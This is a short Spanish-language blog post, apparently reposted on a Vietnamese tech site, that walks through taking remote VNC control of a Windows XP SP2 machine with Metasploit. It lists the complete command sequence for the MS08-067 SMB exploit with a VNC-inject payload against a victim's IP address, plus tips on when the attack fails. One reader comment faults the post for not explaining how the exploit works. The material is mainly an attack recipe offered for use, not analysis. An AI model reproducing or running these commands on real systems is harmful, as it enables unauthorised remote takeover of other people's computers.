Enlace VNC a Windows Xp SP2, utilizando Metasploit Framework



El éxito de este exploit depende de los siguientes factores:
– No actualización de algún parche de seguridad (descargado de Windows Update) para el Windows Xp de la victima que le haga frente al exploit.
– Que no haya algún programa de seguridad instalado del lado de la victima que reconozca el exploit y no lo deje ejecutar (antivirus, firewall, etc)

Lo más probable es que si ocurre lo antes mencionado muestre un mensaje de “Exploit completed, but no session was created”; así que tomate un cafecito y prueba con otra máquina 😉

Uniandes, 2011.

Web de Herramienta:
www.metasploit.com
Web de Sploits liberados:
www.milworm.com
www.securityfocus.com
www.packetstormsecurity.org

Código del Exploit:
use exploit/windows/smb/ms08_067_netapi
set RHOST “anota la ip victima, sin las comillas”
set PAYLOAD windows/vncinject/bind_tcp
exploit

Nguồn: https://tapkich.net.vn/

Xem thêm bài viết khác: https://tapkich.net.vn/category/cong-nghe/

4 thoughts on “Enlace VNC a Windows Xp SP2, utilizando Metasploit Framework

  • buena forma de explicar…. estaria bueno que tambien des una explicacion de como funciona, buffer overflow, etc, mas o menos. Yo tambien soy ingeniero, me hubiera gustado que expliques como el exploit pisa memoria. Sino es un manual de metasploit cosa que no me parece muy educativa que digamos. De paso haces valer tu titulo y mostras la que no estudiaste 5 años para que otro vea un video de 5 min en youtube y se crea hacker. Un saludo de argentina PD: Tambien soy ing en sistemas

Leave a Reply

Leave a Reply

Your email address will not be published. Required fields are marked *